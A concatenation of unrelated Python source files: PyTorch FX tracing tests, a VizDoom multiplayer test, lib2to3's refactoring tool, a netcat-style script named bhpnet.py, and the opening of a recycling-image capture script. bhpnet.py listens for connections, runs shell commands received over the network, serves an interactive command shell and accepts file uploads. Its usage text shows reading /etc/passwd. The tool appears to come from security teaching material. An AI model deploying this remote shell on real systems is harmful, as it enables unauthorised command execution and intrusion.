for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
err, exc = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
err, exc = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
test_vizdoom_multiplayer.py
|
import time
import unittest
from multiprocessing import Process
from unittest import TestCase
from multi_sample_factory.envs.env_utils import vizdoom_available
from multi_sample_factory.utils.utils import log, AttrDict
@unittest.skipUnless(vizdoom_available(), 'Please install VizDoom to run a full test suite')
class TestDoom(TestCase):
@staticmethod
def make_standard_dm(env_config):
from multi_sample_factory.envs.doom.doom_utils import make_doom_env
from multi_sample_factory.envs.tests.test_envs import default_doom_cfg
cfg = default_doom_cfg()
cfg.env_frameskip = 2
env = make_doom_env('doom_deathmatch_full', cfg=cfg, env_config=env_config)
env.skip_frames = cfg.env_frameskip
return env
@staticmethod
def doom_multiagent(make_multi_env, worker_index, num_steps=1000):
env_config = AttrDict({'worker_index': worker_index, 'vector_index': 0, 'safe_init': False})
multi_env = make_multi_env(env_config)
obs = multi_env.reset()
visualize = False
start = time.time()
for i in range(num_steps):
actions = [multi_env.action_space.sample()] * len(obs)
obs, rew, dones, infos = multi_env.step(actions)
if visualize:
multi_env.render()
if i % 100 == 0 or any(dones):
log.info('Rew %r done %r info %r', rew, dones, infos)
if all(dones):
multi_env.reset()
took = time.time() - start
log.info('Took %.3f seconds for %d steps', took, num_steps)
log.info('Server steps per second: %.1f', num_steps / took)
log.info('Observations fps: %.1f', num_steps * multi_env.num_agents / took)
log.info('Environment fps: %.1f', num_steps * multi_env.num_agents * multi_env.skip_frames / took)
multi_env.close()
def test_doom_multiagent(self):
self.doom_multiagent(self.make_standard_dm, worker_index=0)
def test_doom_multiagent_parallel(self):
num_workers = 16
workers = []
for i in range(num_workers):
log.info('Starting worker #%d', i)
worker = Process(target=self.doom_multiagent, args=(self.make_standard_dm, i, 200))
worker.start()
workers.append(worker)
time.sleep(0.01)
for i in range(num_workers):
workers[i].join()
|
refactor.py
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
from __future__ import with_statement
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import os
import sys
import logging
import operator
import collections
import io
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_utils as bu
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
"""Return a sorted list of all available fix names in the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fixer_dir = os.path.dirname(pkg.__file__)
fix_names = []
for name in sorted(os.listdir(fixer_dir)):
if name.startswith("fix_") and name.endswith(".py"):
if remove_prefix:
name = name[4:]
fix_names.append(name[:-3])
return fix_names
class _EveryNode(Exception):
pass
def _get_head_types(pat):
""" Accepts a pytree Pattern Node and returns a set
of the pattern types which will match first. """
if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
# NodePatters must either have no type and no content
# or a type and content -- so they don't get any farther
# Always return leafs
if pat.type is None:
raise _EveryNode
return set([pat.type])
if isinstance(pat, pytree.NegatedPattern):
if pat.content:
return _get_head_types(pat.content)
raise _EveryNode # Negated Patterns don't have a type
if isinstance(pat, pytree.WildcardPattern):
# Recurse on each node in content
r = set()
for p in pat.content:
for x in p:
r.update(_get_head_types(x))
return r
raise Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers and returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
for fixer in fixer_list:
if fixer.pattern:
try:
heads = _get_head_types(fixer.pattern)
except _EveryNode:
every.append(fixer)
else:
for node_type in heads:
head_nodes[node_type].append(fixer)
else:
if fixer._accept_type is not None:
head_nodes[fixer._accept_type].append(fixer)
else:
every.append(fixer)
for node_type in chain(pygram.python_grammar.symbol2number.values(),
pygram.python_grammar.tokens):
head_nodes[node_type].extend(every)
return dict(head_nodes)
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names for fixers in the package pkg_name.
"""
return [pkg_name + "." + fix_name
for fix_name in get_all_fix_names(pkg_name, False)]
def _identity(obj):
return obj
if sys.version_info < (3, 0):
import codecs
_open_with_encoding = codecs.open
# codecs.open doesn't translate newlines sadly.
def _from_system_newlines(input):
return input.replace("\r\n", "\n")
def _to_system_newlines(input):
if os.linesep != "\n":
return input.replace("\n", os.linesep)
else:
return input
else:
_open_with_encoding = open
_from_system_newlines = _identity
_to_system_newlines = _identity
def _detect_future_features(source):
have_docstring = False
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset((token.NEWLINE, tokenize.NL, token.COMMENT))
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
class FixerError(Exception):
"""A fixer could not be loaded."""
class RefactoringTool(object):
_default_options = {"print_function" : False,
"write_unchanged_files" : False}
CLASS_PREFIX = "Fix" # The prefix for fixer classes
FILE_PREFIX = "fix_" # The prefix for modules with a fixer within
def __init__(self, fixer_names, options=None, explicit=None):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: an dict with configuration.
explicit: a list of fixers to run even if they are explicit.
"""
self.fixers = fixer_names
self.explicit = explicit or []
self.options = self._default_options.copy()
if options is not None:
self.options.update(options)
if self.options["print_function"]:
self.grammar = pygram.python_grammar_no_print_statement
else:
self.grammar = pygram.python_grammar
# When this is True, the refactor*() methods will call write_file() for
# files processed even if they were not changed during refactoring. If
# and only if the refactor method's write parameter was True.
self.write_unchanged_files = self.options.get("write_unchanged_files")
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = False
self.driver = driver.Driver(self.grammar,
convert=pytree.convert,
logger=self.logger)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were or should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
for fixer in chain(self.post_order, self.pre_order):
if fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
elif fixer in self.pre_order:
self.bmi_pre_order.append(fixer)
elif fixer in self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
def get_fixers(self):
"""Inspects the options to load the requested patterns and handlers.
Returns:
(pre_order, post_order), where pre_order is the list of fixers that
want a pre-order AST traversal, and post_order is the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
for fix_mod_path in self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
if fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX):]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
try:
fix_class = getattr(mod, class_name)
except AttributeError:
raise FixerError("Can't find %s.%s" % (fix_name, class_name))
fixer = fix_class(self.options, self.fixer_log)
if fixer.explicit and self.explicit is not True and \
fix_mod_path not in self.explicit:
self.log_message("Skipping implicit fixer: %s", fix_name)
continue
self.log_debug("Adding transformation: %s", fix_name)
if fixer.order == "pre":
pre_order_fixers.append(fixer)
elif fixer.order == "post":
post_order_fixers.append(fixer)
else:
raise FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
return (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
raise
def log_message(self, msg, *args):
"""Hook to log a message."""
if args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
if args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called with the old version, new version, and filename of a
refactored file."""
pass
def refactor(self, items, write=False, doctests_only=False):
"""Refactor a list of files and directories."""
for dir_or_file in items:
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
else:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if (not name.startswith(".") and
os.path.splitext(name)[1] == py_ext):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
try:
f = open(filename, "rb")
except IOError as err:
self.log_error("Can't open %s: %s", filename, err)
return None, None
try:
encoding = tokenize.detect_encoding(f.readline)[0]
finally:
f.close()
with _open_with_encoding(filename, "r", encoding=encoding) as f:
return _from_system_newlines(f.read()), encoding
def refactor_file(self, filename, write=False, doctests_only=False):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return
input += "\n" # Silence certain parse errors
if doctests_only:
self.log_debug("Refactoring doctests in %s", filename)
output = self.refactor_docstring(input, filename)
if self.write_unchanged_files or output != input:
self.processed_file(output, filename, input, write, encoding)
else:
self.log_debug("No doctest changes in %s", filename)
else:
tree = self.refactor_string(input, filename)
if self.write_unchanged_files or (tree and tree.was_changed):
# The [:-1] is to take off the \n we added earlier
self.processed_file(str(tree)[:-1], filename,
write=write, encoding=encoding)
else:
self.log_debug("No changes in %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name for use in error/log messages.
Returns:
An AST corresponding to the refactored input stream; None if
there were errors during the parse.
"""
features = _detect_future_features(data)
if "print_function" in features:
self.driver.grammar = pygram.python_grammar_no_print_statement
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s",
name, err.__class__.__name__, err)
return
finally:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def refactor_stdin(self, doctests_only=False):
input = sys.stdin.read()
if doctests_only:
self.log_debug("Refactoring doctests in stdin")
output = self.refactor_docstring(input, "<stdin>")
if self.write_unchanged_files or output != input:
self.processed_file(output, "<stdin>", input)
else:
self.log_debug("No doctest changes in stdin")
else:
tree = self.refactor_string(input, "<stdin>")
if self.write_unchanged_files or (tree and tree.was_changed):
self.processed_file(str(tree), "<stdin>", input)
else:
self.log_debug("No changes in stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree in place).
For compatible patterns the bottom matcher module is
used. Otherwise the tree is traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name for this tree.
Returns:
True if the tree was modified, False otherwise.
"""
for fixer in chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
#use traditional matching for the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
while any(match_set.values()):
for fixer in self.BM.fixers:
if fixer in match_set and match_set[fixer]:
#sort by depth; apply fixers from bottom(of the AST) to top
match_set[fixer].sort(key=pytree.Base.depth, reverse=True)
if fixer.keep_line_order:
#some fixers(eg fix_imports) must be applied
#with the original file's line order
match_set[fixer].sort(key=pytree.Base.get_lineno)
for node in list(match_set[fixer]):
if node in match_set[fixer]:
match_set[fixer].remove(node)
try:
find_root(node)
except ValueError:
# this node has been cut off from a
# previous transformation ; skip
continue
if node.fixers_applied and fixer in node.fixers_applied:
# do not apply the same fixer again
continue
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
#new.fixers_applied.append(fixer)
for node in new.post_order():
# do not apply the fixer again to
# this or any subnode
if not node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
for fxr in new_matches:
if not fxr in match_set:
match_set[fxr]=[]
match_set[fxr].extend(new_matches[fxr])
for fixer in chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
return tree.was_changed
def traverse_by(self, fixers, traversal):
"""Traverse an AST, applying a set of fixers to each node.
This is a helper method for refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that yields AST nodes.
Returns:
None
"""
if not fixers:
return
for node in traversal:
for fixer in fixers[node.type]:
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
node = new
def processed_file(self, new_text, filename, old_text=None, write=False,
encoding=None):
"""
Called when a file has been refactored and there may be changes.
"""
self.files.append(filename)
if old_text is None:
old_text = self._read_python_source(filename)[0]
if old_text is None:
return
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
if equal:
self.log_debug("No changes to %s", filename)
if not self.write_unchanged_files:
return
if write:
self.write_file(new_text, filename, old_text, encoding)
else:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=None):
"""Writes a string to a file.
It first shows a unified diff between the old text and the new text, and
then rewrites the file; the latter is only done if the write option is
set.
"""
try:
f = _open_with_encoding(filename, "w", encoding=encoding)
except os.error as err:
self.log_error("Can't create %s: %s", filename, err)
return
try:
f.write(_to_system_newlines(new_text))
except os.error as err:
self.log_error("Can't write %s: %s", filename, err)
finally:
f.close()
self.log_debug("Wrote changes to %s", filename)
self.wrote = True
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking for doctests.
This returns a modified version of the input string. It looks
for doctests, which start with a ">>>" prompt, and may be
continued with "..." prompts, as long as the "..." is indented
the same as the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it is not geared towards preserving
the original source.)
"""
result = []
block = None
block_lineno = None
indent = None
lineno = 0
for line in input.splitlines(keepends=True):
lineno += 1
if line.lstrip().startswith(self.PS1):
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
elif (indent is not None and
(line.startswith(indent + self.PS2) or
line == indent + self.PS2.rstrip() + "\n")):
block.append(line)
else:
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block = None
indent = None
result.append(line)
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
return "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest is given as a block of lines, the first of which starts
with ">>>" (possibly indented), while the remaining lines start
with "..." (identically indented).
"""
try:
tree = self.parse_block(block, lineno, indent)
except Exception as err:
if self.logger.isEnabledFor(logging.DEBUG):
for line in block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error("Can't parse docstring in %s line %s: %s: %s",
filename, lineno, err.__class__.__name__, err)
return block
if self.refactor_tree(tree, filename):
new = str(tree).splitlines(keepends=True)
# Undo the adjustment of the line numbers in wrap_toks() below.
clipped, new = new[:lineno-1], new[lineno-1:]
assert clipped == ["\n"] * (lineno-1), clipped
if not new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
if new:
block += [indent + self.PS2 + line for line in new]
return block
def summarize(self):
if self.wrote:
were = "were"
else:
were = "need to be"
if not self.files:
self.log_message("No files %s modified.", were)
else:
self.log_message("Files that %s modified:", were)
for file in self.files:
self.log_message(file)
if self.fixer_log:
self.log_message("Warnings/messages while refactoring:")
for message in self.fixer_log:
self.log_message(message)
if self.errors:
if len(self.errors) == 1:
self.log_message("There was 1 error:")
else:
self.log_message("There were %d errors:", len(self.errors))
for msg, args, kwds in self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This is necessary to get correct line number / offset information
in the parser diagnostics and embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
return tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
for type, value, (line0, col0), (line1, col1), line_text in tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this is too complicated
# since line_text would also have to be updated and it would
# still break for tokens spanning lines. Let the user guess
# that the column numbers for doctests are relative to the
# end of the prompt string (PS1 or PS2).
yield type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines as expected by tokenize from a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
for line in block:
if line.startswith(prefix):
yield line[len(prefix):]
elif line == prefix.rstrip() + "\n":
yield "\n"
else:
raise AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
while True:
yield ""
class MultiprocessingUnsupported(Exception):
pass
class MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = None
self.output_lock = None
def refactor(self, items, write=False, doctests_only=False,
num_processes=1):
if num_processes == 1:
return super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only)
try:
import multiprocessing
except ImportError:
raise MultiprocessingUnsupported
if self.queue is not None:
raise RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [multiprocessing.Process(target=self._child)
for i in range(num_processes)]
try:
for p in processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(items, write,
doctests_only)
finally:
self.queue.join()
for i in range(num_processes):
self.queue.put(None)
for p in processes:
if p.is_alive():
p.join()
self.queue = None
def _child(self):
task = self.queue.get()
while task is not None:
args, kwargs = task
try:
super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
finally:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
if self.queue is not None:
self.queue.put((args, kwargs))
else:
return super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
|
bhpnet.py
|
import sys
import socket
import getopt
from threading import Thread
import subprocess
# define some global variables
LISTEN = False
COMMAND_SHELL = False
UPLOAD = False
EXECUTE = ""
TARGET = "" # localhost
UPLOAD_DEST = ""
PORT = 0
def run_command(command):
# run the command and get the output back
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except:
output = b"Failed to execute command.\r\n"
# send the output back to the client
return output
def client_handler(client_socket):
global UPLOAD
global EXECUTE
global COMMAND_SHELL
# check for upload
if len(UPLOAD_DEST):
# read in all of the bytes and write to our destination
file_buffer = ""
# keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
# now we take these bytes and try to write them out
with open(UPLOAD_DEST, "wb") as file_descriptor:
file_descriptor.write(file_buffer)
# acknowledge that we wrote the file out
client_socket.send("Successfully saved file to {}\r\n".format(UPLOAD_DEST))
# check for command execution
if len(EXECUTE):
# run the command
output = run_command(EXECUTE)
client_socket.send(output.decode('utf-8'))
# now go into another loop if a command shell was requested
if COMMAND_SHELL:
while True:
# show a simple prompt
client_socket.send("<BHP:#> ".encode('utf-8'))
# now we receive until we see a linefeed (ENTER key)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024).decode("utf-8")
# we have a valid command so execute it and send back the results
response = run_command(cmd_buffer)
# send back the response
client_socket.send(response)
def server_loop():
global TARGET
global PORT
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Listen on all interfaces if no target is defined
if not len(TARGET):
print("Server listening on all interfaces")
TARGET = ""
server.bind((TARGET, PORT))
server.listen(5)
while True:
print("Waiting for connection...")
client_socket, addr = server.accept()
print("Server starting @ {}".format(addr))
# spin off a thread to handle our new client
client_thread = Thread(target=client_handler, args=(client_socket,))
client_thread.start()
client_thread.run()
except socket.error as err:
print("{0} Server Exception! Exiting.".format(str(err)))
except OSError as err:
print("Server OS error: {0}".format(err))
except Exception as inst:
print(type(inst))
print(inst)
except:
print("Unknown Server Exception! Exiting.")
finally:
# close the connection
server.close()
sys.exit(0)
# if we don't listen we are a client....make it so.
def client_sender():
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((TARGET, PORT))
print("Client connected")
while True:
# wait for data received from the server
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data.decode("utf-8")
if recv_len < 4096:
break
print(response)
# wait for input from the user
buffer = input()
buffer += "\n"
# send data to the server
client.send(buffer.encode('utf-8'))
except socket.error as err:
print("{0} Client Exception! Exiting.".format(str(err)))
except OSError as err:
print("Client OS error: {0}".format(err))
except Exception as inst:
print(type(inst))
print(inst)
except:
print("Unknown Client Exception! Exiting.")
finally:
# close the connection
client.close()
sys.exit(0)
def usage():
"""Prints the usage and options of the script then terminates the script"""
print("")
print("Netcat Replacement")
print("")
print("Usage: bhpnet.py -t target_host -p port")
print("-l --listen : listen on [host]:[port] for incoming connections")
print("-e --execute=file_to_run : execute the given file upon receiving a connection")
print("-c --command : initialize a command shell")
print("-u --upload=destination : upon receiving connection upload a file and write to [destination]")
print("")
print("Examples:")
print("bhpnet.py -t 192.168.0.1 -p 5555 -l -c")
print("bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe")
print("bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"")
print("echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135")
print("")
sys.exit(0)
def main():
"""
Main function. Parses options passed to the script and determines if the script
will run as a server or a client.
"""
global LISTEN
global PORT
global EXECUTE
global COMMAND_SHELL
global UPLOAD_DEST
global TARGET
# Display the options and usage information if no command line options are passed.
if not len(sys.argv[1:]):
usage()
# Read the command line options
try:
opts, args = getopt.getopt(sys.argv[1:],
"hle:t:p:cu:",
["help", "listen", "execute", "target", "port", "command", "upload"])
except getopt.GetoptError as err:
print(str(err))
usage()
for o, a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
LISTEN = True
elif o in ("-e", "--execute"):
EXECUTE = a
elif o in ("-c", "--command"):
COMMAND_SHELL = True
elif o in ("-u", "--upload"):
UPLOAD_DEST = a
elif o in ("-t", "--target"):
TARGET = a
elif o in ("-p", "--port"):
PORT = int(a)
else:
assert False, "Unhandled Option"
# Determine if the script should be ran as a TCP server or client.
if LISTEN:
# we are going to listen and potentially upload things, execute commands, and drop a shell back
# depending on the command line options above
server_loop()
elif len(TARGET) and PORT > 0:
# we are going to be sending data to the server.
# send data off
client_sender()
if __name__ == '__main__':
main()
|
gather.py
|
import os
import sys
import PySpin
from absl import app
from absl import flags
import numpy as np
import cv2
import time
from os import mkdir
from os.path import isdir, exists
import threading
import queue
import logging
import boto3
from botocore.exceptions import ClientError
from dataclasses import dataclass
WINDOW_NAME = "Recyclops"
FONT = cv2.FONT_HERSHEY_SIMPLEX
CATEGORY_DISPLAY_MILLISECONDS = 750
NUM_BUFFERS = 3
INFO_COLOR = (81, 237, 14)
s3_client_upload = None
flags.DEFINE_string(
'image_file_type',
'jpg',
'File format to saving images as',
)
flags.DEFINE_bool(
'send_to_cloud',
True,
'Should captured images be sent to S3?',
)
flags.DEFINE_string(
's3_bucket_name',
'recyclops',
'Name of the s3 bucket to send images to'
)
flags.DEFINE_float(
'display_scale_factor',
0.5,
'Scale factor to apply to displayed images',
)
flags.DEFINE_float(
'save_scale_factor',
0.5,
'Scale factor to apply to saved images',
)
flags.DEFINE_bool(
'mirror_display',
True,
'Mirror the displayed image',
)
@dataclass
class Category:
display_name: str
data_name: str
text_color: tuple
keyboard_string: str
@dataclass
class ImageToSave:
filename: str
category_str: str
image_data: np.ndarray
aluminum_category = Category('Aluminum', 'aluminum', (237, 181, 14), '1')
compost_category = Category('Compost', 'compost', (219, 56, 210), '2')
glass_category = Category('Glass', 'glass', (255, 74, 164), '3')
paper_category = Category('Paper', 'paper', (230, 245, 24), '4')
plastic_category = Category('Plastic', 'plastic', (24, 230, 245), '5')
trash_category = Category('Trash', 'trash', (24, 171, 245), '0')
categories = [aluminum_category, compost_category, glass_category,\
paper_category, plastic_category, trash_category]
def bucket_exists(bucket_name):
"""Determine whether bucket_name exists and the user has permission to access it
:param bucket_name: string
:return: True if the referenced bucket_name exists, otherwise False
"""
